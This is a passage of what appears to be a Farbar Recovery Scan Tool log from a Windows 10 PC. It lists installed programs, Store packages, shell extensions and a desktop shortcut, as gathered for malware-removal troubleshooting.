PACE License Support Win64 (HKLM\...\{72ad9d51-0903-4fe7-af5d-33b3185fa6e9}) (Version: 2.4.2.0737 - PACE Anti-Piracy, Inc.) Hidden
PACE License Support Win64 (HKLM-x32\...\InstallShield_{72ad9d51-0903-4fe7-af5d-33b3185fa6e9}) (Version: 2.4.2.0737 - PACE Anti-Piracy, Inc.)
PCM Native Reverb VST Plug-in (HKLM-x32\...\{B4691C58-2A6A-4AFA-960E-AEB767639E44}) (Version: 1.0.0 - Lexicon) Hidden
PCM Native Reverb VST Plug-in (HKLM-x32\...\PCM Native Reverb VST Plug-in) (Version:  - Lexicon)
PDFCreator (HKLM\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 2.5.2 - pdfforge GmbH)
PMDG 737 8900 NGX Base Package FSX (HKLM-x32\...\{20708FD5-E94D-4097-A21E-E28564CDBC06}) (Version: 1.10.6436 - PMDG Simulations, LLC.)
PureSync (HKLM-x32\...\{728DB5F9-AFAC-4027-B0A0-4194D89328E4}) (Version: 4.7.3 - Jumping Bytes)
qBittorrent 4.1.6 (HKLM-x32\...\qBittorrent) (Version: 4.1.6 - The qBittorrent project)
Quick Search 5.28.1.101 (HKLM-x32\...\Quick Search) (Version: 5.28.1.101 - Glarysoft Ltd)
QuickTime 7 (HKLM-x32\...\{FF59BD75-466A-4D5A-AD23-AAD87C5FD44C}) (Version: 7.79.80.95 - Apple Inc.)
RapidMiner Studio (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\RapidMiner Studio) (Version: 7.6.1.0 - RapidMiner)
RealAir Turbine Duke (HKLM\...\Turbine Duke07.1.10.35) (Version: 07.1.10.35 - RealAir Simulations)
REAPER (x64) (HKLM\...\REAPER) (Version:  - )
Revolution DB Master 19 Beta 1 (HKLM-x32\...\Revolution DB Master 19_is1) (Version:  - FIFA MASTER)
REX 4 - Weather Architect (HKLM-x32\...\{1D59EFDF-0A58-4FF9-A468-A1190F1FAFEB}) (Version: 4.0.2015.0717 - REX Game Studios, LLC.)
rtpMIDIBlockLegacy (HKLM-x32\...\{FD937297-84C3-41A5-B5DF-1FAEEE669D68}) (Version: 9.9.9.9 - Tobias Erichsen) Hidden
SafeZone Stable 3.55.2393.609 (HKLM-x32\...\SafeZone 3.55.2393.609) (Version: 3.55.2393.609 - Avast Software) Hidden
Sandboxie 5.30 (64-bit) (HKLM\...\Sandboxie) (Version: 5.30 - Sandboxie Holdings, LLC)
Scid vs PC 4.18 (HKLM-x32\...\Scid vs PC_is1) (Version: 4.18 - Steven Atkinson)
Screen Protractor (HKLM-x32\...\Screen Protractor) (Version: 4.0 - Iconico)
SDK ARM Additions (HKLM-x32\...\{0B5D6FB7-05A5-271B-5B99-82384219A471}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
SDK ARM Redistributables (HKLM-x32\...\{4A5F6E94-7967-A333-8231-CA9AF35E03BD}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
SimCity (HKLM-x32\...\SimCity_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, markfiter)
SimCity 4 Deluxe Edition (HKLM-x32\...\GOGPACKSC4_is1) (Version: 2.0.0.8 - GOG.com)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
SumatraPDF (HKLM\...\SumatraPDF) (Version: 3.1.2 - Krzysztof Kowalczyk)
TeamViewer 13 (HKLM-x32\...\TeamViewer) (Version: 13.2.36215 - TeamViewer)
teVirtualMIDI64 (HKLM\...\{9084640A-366B-4C44-BDB1-74864B460B13}) (Version: 1.2.10.38 - Tobias Erichsen) Hidden
thinkorswim (HKLM\...\9968-4488-2169-7623) (Version: desktop - thinkorswim, Inc)
Traffic Simulator Configuration Tool (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Traffic Simulator Configuration Tool) (Version:  - )
TypeScript SDK (HKLM-x32\...\{3CBDDAE8-99AE-4168-BDA7-8352BF15BE73}) (Version: 3.1.2.0 - Microsoft Corporation) Hidden
TypeScript SDK (HKLM-x32\...\{CFA1F87E-EF2B-4785-812C-4BEEA22CFD06}) (Version: 2.3.5.0 - Microsoft Corporation) Hidden
UltraSearch V2.3 (64 bit) (HKLM\...\UltraSearch_is1) (Version: 2.3 - JAM Software)
Unity (HKLM-x32\...\Unity) (Version: 5.6.3p1 - Unity Technologies ApS)
Universal CRT Extension SDK (HKLM-x32\...\{1FBCBC17-4527-2340-0832-B1D49C41FF67}) (Version: 10.0.26624 - Microsoft Corporation) Hidden
Universal CRT Extension SDK (HKLM-x32\...\{7D225043-6CC5-7B56-11DD-AFF90E4C1C0C}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal CRT Extension SDK (HKLM-x32\...\{BE2D1829-B45D-4D78-BF02-4076B86AC57C}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
Universal CRT Headers Libraries and Sources (HKLM-x32\...\{8BFBEC30-33CC-13B4-849F-3B036F27466A}) (Version: 10.0.26624 - Microsoft Corporation) Hidden
Universal CRT Headers Libraries and Sources (HKLM-x32\...\{A46D1F7A-BA32-2375-EF97-4975E594A7E7}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
Universal CRT Headers Libraries and Sources (HKLM-x32\...\{CB19DBA2-C210-5646-9522-695A1317CD34}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal CRT Redistributable (HKLM-x32\...\{413A1F9C-9349-4847-610E-BAB177A48ADE}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
Universal CRT Redistributable (HKLM-x32\...\{5F577A45-3C65-352B-061D-D6A57F05402C}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal CRT Tools x64 (HKLM\...\{3B588BBE-EB02-D1B2-5CD5-7DB85AD8A3E7}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal CRT Tools x86 (HKLM-x32\...\{D2DC1EDF-EE04-9B5F-BDD7-06645D859EC3}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal General MIDI DLS Extension SDK (HKLM-x32\...\{CE83D0BD-418A-F3D1-D6CE-687E96D1EBD0}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal General MIDI DLS Extension SDK (HKLM-x32\...\{E2EA2702-534B-D6C1-5AC4-724E3CE7B2D9}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
Universal Patch Finder version 1.5 (HKLM-x32\...\{88FBB3D2-C9A5-41E4-88B8-3F4F1722E7D1}_is1) (Version: 1.5 - Hypercube Softwares)
Update for  (KB2504637) (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}.KB2504637) (Version: 1 - Microsoft Corporation)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{9C4F3AF4-21D8-43BD-A69C-517BB96012CF}) (Version: 2.12.0.0 - Microsoft Corporation)
UpdateAssistant (HKLM-x32\...\{B302EECB-0DA5-46E6-8A58-127440F22CF1}) (Version: 1.7.0.0 - Microsoft Corporation) Hidden
VBSBeautifier (remove only) (HKLM-x32\...\VBSBeautifier) (Version:  - )
vcpp_crt.redist.clickonce (HKLM-x32\...\{253D6AD3-5786-4B3B-B4E1-E082482A1F26}) (Version: 14.16.27033 - Microsoft Corporation) Hidden
VeraCrypt (HKLM-x32\...\VeraCrypt) (Version: 1.21 - IDRIX)
Viber (HKLM-x32\...\{32AF88A9-E104-4306-8B68-CB92FFD2CAD6}) (Version: 11.0.0.42 - Viber Media S.a.r.l) Hidden
Viber (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\{9097b5b3-1f2b-4ff7-a350-97a76bb76fb8}) (Version: 11.0.0.42 - Viber Media S.a.r.l)
Visual Studio Community 2017 (HKLM-x32\...\fba7c5bd) (Version: 15.9.28307.905 - Microsoft Corporation)
VLC media player (HKLM-x32\...\VLC media player) (Version: 3.0.8 - VideoLAN)
VoiceBot 3.0 (HKLM-x32\...\2BB5202A-885B-454F-8624-FD3310CD3225_is1) (Version: 3.0.0.0 - Binary Fortress Software)
VS Immersive Activate Helper (HKLM-x32\...\{54FBC9A9-CCA1-417E-ACA6-203A32A39F37}) (Version: 16.0.95.0 - Microsoft Corporation) Hidden
VS JIT Debugger (HKLM\...\{4B816AD0-D12B-498A-8148-7CBE3ED328DE}) (Version: 16.0.95.0 - Microsoft Corporation) Hidden
VS Script Debugging Common (HKLM\...\{8B657335-3813-4CF4-A6FE-2AA44BE23F94}) (Version: 16.0.95.0 - Microsoft Corporation) Hidden
vs_BlendMsi (HKLM-x32\...\{C5D83E0F-12E7-4BA3-98E6-DAE0E73B5BF9}) (Version: 15.0.27205 - Microsoft Corporation) Hidden
vs_clickoncebootstrappermsi (HKLM-x32\...\{A68D7884-F036-4A0D-AE1A-410E0311E135}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
vs_clickoncebootstrappermsires (HKLM-x32\...\{91DDDFB5-1782-48C2-BA2A-8F4D9DE39D27}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
vs_clickoncesigntoolmsi (HKLM-x32\...\{6A1ECF65-2CBF-4B33-9D4A-D1C0A0E5FE45}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
vs_communitymsi (HKLM-x32\...\{71797C29-380A-492C-B35A-F5E4A7B57BDC}) (Version: 15.9.28307 - Microsoft Corporation) Hidden
vs_communitymsires (HKLM-x32\...\{40040E64-50EB-4FCF-B209-DA0B20821759}) (Version: 15.0.26621 - Microsoft Corporation) Hidden
vs_devenvmsi (HKLM-x32\...\{BFFA2FFB-1095-4ADD-A352-368806D2412B}) (Version: 15.0.26621 - Microsoft Corporation) Hidden
vs_filehandler_amd64 (HKLM-x32\...\{A254DA0E-26A1-43C3-95BE-7A24D5599473}) (Version: 15.9.28302 - Microsoft Corporation) Hidden
vs_filehandler_x86 (HKLM-x32\...\{1F42A73E-CF26-4D67-BA79-752CA56B639F}) (Version: 15.9.28302 - Microsoft Corporation) Hidden
vs_FileTracker_Singleton (HKLM-x32\...\{A41E138F-5A3F-443C-B72D-957AB994FB5A}) (Version: 15.9.28128 - Microsoft Corporation) Hidden
vs_Graphics_Singletonx64 (HKLM\...\{B6BAC9A6-A70D-4E4D-B90A-7EE2B336E090}) (Version: 15.8.27729 - Microsoft Corporation) Hidden
vs_Graphics_Singletonx86 (HKLM-x32\...\{3161DA68-DD37-4798-82DB-B3A0BD6BA233}) (Version: 15.8.27729 - Microsoft Corporation) Hidden
vs_minshellinteropmsi (HKLM-x32\...\{3A78DA3D-C8D4-429D-B536-6E59A0088451}) (Version: 15.8.27825 - Microsoft Corporation) Hidden
vs_minshellmsi (HKLM-x32\...\{68B8AD33-CE97-4C3D-9583-669C39D21BA5}) (Version: 15.9.28302 - Microsoft Corporation) Hidden
vs_minshellmsires (HKLM-x32\...\{6DFE6F8D-B61D-4348-AB70-4ABF1210DFD5}) (Version: 15.0.26621 - Microsoft Corporation) Hidden
vs_SQLClickOnceBootstrappermsi (HKLM-x32\...\{5779B6DD-604A-41CE-BC3D-9D4BDDA22AD2}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
vs_tipsmsi (HKLM-x32\...\{1AC6CC3D-7724-4D84-9270-798A2191AB1C}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
Weka 3.8.3 (HKLM\...\Weka 3.8.3) (Version: 3.8.3 - Machine Learning Group, University of Waikato, Hamilton, NZ)
WinAppDeploy (HKLM-x32\...\{03343DEA-224B-E9B6-1FBB-E637E6BC6BAA}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinAppDeploy (HKLM-x32\...\{716AE8F2-1BE3-7657-DF6B-F23DEEC75AF9}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinAutomation (HKLM\...\{67F5E390-8E09-4AE4-B7F2-705AFD23D86D}) (Version: 6.0.2.4227 - Softomotive Ltd) Hidden
WinAutomation (HKLM-x32\...\WinAutomation) (Version: 6.0.2.4227 - Softomotive Ltd)
Windows 10 Update Assistant (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.22211 - Microsoft Corporation)
Windows SDK AddOn (HKLM-x32\...\{E1C6F438-7C50-41F5-8B47-3CC96D397CA3}) (Version: 10.1.0.0 - Microsoft Corporation)
Windows Setup Remediations (x64) (KB4023057) (HKLM\...\{5534e02f-0f5d-40dd-ba92-bea38d22384d}.sdb) (Version:  - )
Windows Software Development Kit - Windows 10.0.15063.674 (HKLM-x32\...\{6824cee4-b358-4633-b82c-5f20894af8e2}) (Version: 10.1.15063.674 - Microsoft Corporation)
Windows Software Development Kit - Windows 10.0.17763.132 (HKLM-x32\...\{5fe95b9d-9219-4d8b-a031-71323ae48a81}) (Version: 10.1.17763.132 - Microsoft Corporation)
WinRAR 5.40 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)
WinRT Intellisense Desktop - en-us (HKLM-x32\...\{00B12DF9-5428-9406-DE2C-8E8A1A062B05}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense Desktop - en-us (HKLM-x32\...\{D8AA52A2-81E2-BB84-AAF9-C487C586CC15}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense Desktop - Other Languages (HKLM-x32\...\{5715A2A6-E637-81E3-464D-3F0F999E506A}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense Desktop - Other Languages (HKLM-x32\...\{E82A4A6C-C21C-35FE-B805-3E44318F6D63}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - en-us (HKLM-x32\...\{2B8614A6-D0C1-CFE0-9311-7AF9227DC9BA}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - en-us (HKLM-x32\...\{7E898893-9C42-A572-7F57-FDE55CE812F7}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - Other Languages (HKLM-x32\...\{409D68FF-37DD-F8F4-A60F-30BEAA4AA4CE}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - Other Languages (HKLM-x32\...\{E8B1CB29-5C24-D882-3CEF-F8A7263BC63D}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense Mobile - en-us (HKLM-x32\...\{F6F11150-93DE-0507-FCA0-F746E0207017}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - en-us (HKLM-x32\...\{3617F573-CF51-0F5A-063F-B272F98D0522}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - en-us (HKLM-x32\...\{8329C3A0-8582-D1C2-67FF-800654BFDF45}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - Other Languages (HKLM-x32\...\{771C9DEF-7C0B-85DA-6426-7A20F06BEC94}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - Other Languages (HKLM-x32\...\{FDE59EF8-D43D-F9DA-5B0C-CC9C90DB0335}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - en-us (HKLM-x32\...\{87CC4887-0873-F87B-D804-6A78B07DC1F5}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - en-us (HKLM-x32\...\{B047C746-63E8-41C7-A5C0-7ABD390CF3E6}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - Other Languages (HKLM-x32\...\{0063AF94-397B-9C64-1C71-D404B27C5D96}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - Other Languages (HKLM-x32\...\{D62E0DD5-9853-C09C-AE15-D02988503C60}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
wxWidgets 3.0.4 (HKLM-x32\...\wxWidgets_is1) (Version:  - wxWidgets)
X-Mouse Button Control 2.18.8 (HKLM-x32\...\X-Mouse Button Control) (Version: 2.18.8 - Highresolution Enterprises)
ZBrush 4R7 (HKLM-x32\...\ZBrush 4R7 4R7) (Version: 4R7 - Pixologic)

Packages:
=========
Mail and Calendar -> C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12228.20206.0_x64__8wekyb3d8bbwe [2019-11-20] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-01-19] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-01-19] (Microsoft Corporation) [MS Ad]
Microsoft News -> C:\Program Files\WindowsApps\Microsoft.BingNews_4.33.13094.0_x64__8wekyb3d8bbwe [2019-11-13] (Microsoft Corporation) [MS Ad]
Microsoft Phone Companion -> C:\Program Files\WindowsApps\Microsoft.WindowsPhone_10.1802.311.0_x64__8wekyb3d8bbwe [2018-11-13] (Microsoft Corporation)
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.11052.0_x64__8wekyb3d8bbwe [2019-11-10] (Microsoft Studios) [MS Ad]
MSN Money -> C:\Program Files\WindowsApps\Microsoft.BingFinance_4.31.11905.0_x64__8wekyb3d8bbwe [2019-07-19] (Microsoft Corporation) [MS Ad]
MSN Sports -> C:\Program Files\WindowsApps\Microsoft.BingSports_4.31.11905.0_x64__8wekyb3d8bbwe [2019-07-19] (Microsoft Corporation) [MS Ad]
MSN Weather -> C:\Program Files\WindowsApps\Microsoft.BingWeather_4.33.13253.0_x64__8wekyb3d8bbwe [2019-11-23] (Microsoft Corporation) [MS Ad]
Photos Media Engine Add-on -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2019-11-13] (Microsoft Corporation)

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-3967059023-4107875624-2872843465-1001_Classes\CLSID\{23066764-9BDD-4FBD-8B1F-F4547CF2684F}\InprocServer32 -> C:\Users\SR\AppData\Local\Microsoft\OneDrive\18.070.0405.0002\amd64\FileSyncShell64.dll => No File
CustomCLSID: HKU\S-1-5-21-3967059023-4107875624-2872843465-1001_Classes\CLSID\{E31EA727-12ED-4702-820C-4B6445F28E1A} -> [Dropbox] => C:\Users\SR\Dropbox [2018-01-03 12:23]
ShellIconOverlayIdentifiers: [   DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> )
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> )
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> )
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
ShellIconOverlayIdentifiers-x32: [   DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> )
ContextMenuHandlers1: [AESCrypt] -> {35872D53-3BD4-45FA-8DB5-FFC47D4235E7} => C:\Program Files\AESCrypt\AESCrypt.dll [2015-04-17] (Packetizer, Inc.) [File not signed]
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_06.dll [2018-07-23] (Notepad++ -> )
ContextMenuHandlers1: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ContextMenuHandlers1: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2017-08-26] (Florian Heidenreich) [File not signed]
ContextMenuHandlers1: [PDFCreator.ShellContextMenu] -> {d9cea52e-100d-4159-89ea-76e845bc13e1} => C:\Program Files\PDFCreator\PDFCreatorShell.DLL [2017-01-31] (pdfforge GmbH -> pdfforge GmbH)
ContextMenuHandlers1: [PureSync] -> {D1079645-619B-4d0b-8FD5-1008B95134E1} => C:\Program Files (x86)\Jumping Bytes\PureSync\shellext\psshell64.dll [2016-03-03] (Jumping Bytes  (Christoph Guentner) -> Jumping Bytes)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-14] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-14] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers2: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2017-08-26] (Florian Heidenreich) [File not signed]
ContextMenuHandlers2: [PureSync] -> {D1079645-619B-4d0b-8FD5-1008B95134E1} => C:\Program Files (x86)\Jumping Bytes\PureSync\shellext\psshell64.dll [2016-03-03] (Jumping Bytes  (Christoph Guentner) -> Jumping Bytes)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-06-26] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers4: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ContextMenuHandlers4: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2017-08-26] (Florian Heidenreich) [File not signed]
ContextMenuHandlers4: [PureSync] -> {D1079645-619B-4d0b-8FD5-1008B95134E1} => C:\Program Files (x86)\Jumping Bytes\PureSync\shellext\psshell64.dll [2016-03-03] (Jumping Bytes  (Christoph Guentner) -> Jumping Bytes)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} =>  -> No File
ContextMenuHandlers5: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2018-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> )
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-06-26] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-14] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-14] (win.rar GmbH -> Alexander Roshal)

==================== Codecs (Whitelisted) ====================

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)

Shortcut: C:\Users\SR\Desktop\Traffic Simulator Configuration Tool.lnk -> C:\Program Files (x86)\Traffic Simulator Configuration Tool\TSCT.bat ()
